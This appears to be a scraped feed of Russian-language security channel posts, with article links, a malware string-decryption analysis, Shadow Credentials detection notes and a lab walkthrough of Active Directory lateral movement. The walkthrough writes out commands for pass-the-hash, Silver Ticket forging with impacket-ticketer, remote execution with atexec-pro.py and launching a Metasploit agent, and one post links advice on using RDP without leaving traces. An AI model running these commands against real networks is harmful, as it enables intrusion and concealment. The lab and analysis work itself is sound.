Fsecurity | HH

🦾 Обещанная статья на тему сдачи OSCP+ в 2025 году. Что ждать на экзамене, как сейчас готовиться, что творится вообще!? 😼 Всё это я постарался ёмко описать в данном материале 🔗 Ссылка на статью в telegra.ph

🔗Ссылка: https://www.anti-malware.ru/news/2025-03-07-121598/45460

Используете ли вы криптографию правильно? 🔓 Группе исследования сложных угроз департамента Threat Intelligence часто приходится решать интересные задачи в процессе реверса ВПО. Этот раз не стал исключением. Существует такая техника, как Execution Guardrails: Environmental Keying, — она нужна для ограничения выполнения ВПО только в конкретной целевой среде. Например, ее использует группировка Decoy Dog в своих операциях. В попавшем к нам на исследование семпле применялась эта же техника: в качестве ключа для используемых строк использовалось имя компьютера, которого у нас не было, дополнительно семпл был обфусцирован. В случае, если ВПО запускалось не на нужном злоумышленнику устройстве, оно крашилось — отсюда и стартует наше исследование. ☠️ Выяснилось, что ВПО «падает» при попытке вызова функции LoadLibraryA с переданным именем библиотеки в качестве неотображаемых байтов. Этот набор байтов должен представлять собой имя библиотеки, которая расшифровывается в цикле; при каждой итерации берется символ от имени компьютера, с помощью логических операций приводится в необратимый вид, а после уже гаммируется с зашифрованным текстом и его однобайтовой константой. Чтобы вычислить промежуточный ключ (который формируется в результате логических операций), мы прибегнули к атаке на основе открытого текста. Возвращаясь к функции LoadLibraryA: мы знаем, что имя библиотеки будет составлять 13 байт в кодировке ASCII + '\x00'; так мы смогли восстановить треть ключа, а далее по аналогии уже с другими строками восстановили оставшуюся часть ключа.

Дешифрование строки:
F(sym_comp_name) ^ sym_enc ^ cnst_enc = sym_dec
F(sym_comp_name) — логические операции

Получение промежуточного ключа:
sym_dll_name ^ sym_enc ^ cnst_enc = irr_sym_key
irr_sym_key — промежуточный байт ключа, необратимый

Группа исследования сложных угроз рекомендует одну из платформ для изучения криптоанализа — cryptohack.org. #tips #reverse #malware #cryptography #TI @ptescalator

🔗Ссылка: https://habr.com/ru/companies/tomhunter/articles/885478/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

#soc Свежие индикаторы компрометации: NTLM Relay Attack Текущая реализация атаки Shadow credentials во фреймворке Impacket, используемая, в частности, скриптом ntlmrelayx.py, содержит множество ошибок, оставляющих уникальные подписи на структурах данных NGC, записываемых злоумышленниками в LDAP-атрибут msDS-KeyCredentialLink. С помощью эвристики можно выявить большинство вредоносных ключей NGC, независимо от того, с помощью какого хакерского инструмента они были сгенерированы.

💻Remote NTLM Relay preparation: Lateral Movement without NTLM and 445/TCP💻 В ходе решения одной из сетей на известной платформе может сложиться ситуация, с которой столкнулся я. Имея привилегированный доступ к серверу, который впоследствии будет использоваться для Remote NTLM Relay, я без задней мысли отключил службы NetLogon, LanManServer и LanManWorkstation и перезагрузил машину, забыв закрепиться на ней встроенными средствами фрэймворка постэксплуатации. Сделал я это следующим образом:

sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled

После перезагрузки хоста я удостоверился, что порт 445 не прослушивается сервером (nmap -p 445 -sT -Pn <serverIP>), после чего решил продолжить атаку, но столкнулся с очевидной проблемой: я не могу пройти аутентификацию на сервере и, следовательно, запустить бинарный файл, необходимый для организации портфорвардинга. Имеем 2 проблемы: 1) Не работают службы NetLogon, LanManServer и LanManWorkstation, из-за чего не получится пройти аутентификацию на целевом сервере при помощи NTLM; 2) Не работает SMB-порт, необходимый для работы большинства утилит из набора Impacket. Что же делать? Решение довольно очевидное. Вместо NTLM можно использовать Kerberos, так как мы находимся в доменной инфраструктуре. Не зря же после получения системного доступа к атакуемому серверу мы дампили его LSA-секреты? А вместо стандартных скриптов из набора Impacket можно использовать их "pro вариации", которые не требуют доступа к 445 порту целевого сервера. Начнем атаку! Шаг 1. Silver Ticket🎫 Первый шаг показан в демонстративных целях, чтобы видеть хэш пароля учетной записи атакуемого сервера. Напомню, что его мы получили ранее путем дампа LSA-секретов на самом сервере.

proxychains impacket-secretsdump holo.live/Administrator@10.201.126.30 -hashes :<redacted> -just-dc-user 'PC-FILESRV01$'

...
PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4

Для осуществления атаки нам необходим SID домена, который мы получим с использованием скрипта impacket-lookupsid из набора Impacket (в данном случае используем технику Pass-the-Hash в отношении контроллера домена):

proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4

Получаем SID домена: S-1-5-21-471847105-3603022926-1728018720

После получения SID начинаем крафтить Silver Ticket, чтобы получить привилегированный доступ к целевому серверу. Путь до полученного тикета записываем в переменную окружения KRB5CCNAME:

proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'

export KRB5CCNAME=watamet.ccache

Шаг 2. ATExec Pro🤩 После этого уже при помощи известного нам atexec-pro.py и полученного билета получаем доступ к целевому серверу и запускаем наш C2-агент (для примера здесь используется MSF):

proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30

Внутри шелла:
ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe

Поэтапно те же действия можно видеть на приложенных скриншотах. 1) Получение SID домена при помощи impacket-lookupsid; 2) Создание Silvet Ticket при помощи impacket-ticketer для привилегированного доступа к целевому хосту; 3) Получение доступа к целевому хосту при помощи atexec-pro.py с использованием ранее полученного билета (обращаю внимание на лог ProxyChains, где отсутствует коннект до 445 порта).

BurpSuite Extension * Xkeys

🔗Ссылка: https://github.com/rohitcoder/hawk-eye

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Попался интересный материал про RDP. В блоге про то, какие следы можно найти после использования RDP, и как эти следы не оставлять https://blog.devolutions.net/2025/03/using-rdp-without-leaving-traces-the-mstsc-public-mode/ P.S. пока сильно не вникал, оставил как заметку📝 #ad #pentest #redteam #bypass #lateralmovement

🔗Ссылка: https://habr.com/ru/companies/securityvison/articles/888522/

Когда спрашивают про отчет по пентесту

🔗Ссылка: https://habr.com/ru/companies/selectel/articles/840834/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://spy-soft.net/rce-vulnerability-via-file-upload/

При эксплуатации уязвимостей ADCS могут возникать разные ошибки. В блоге подробно рассмотрены причины популярных ошибок, а также варианты решения этих проблем https://sensepost.com/blog/2025/diving-into-ad-cs-exploring-some-common-error-messages/ #pentest #redteam #adcs

🔗Ссылка: https://www.securitylab.ru/news/557001.php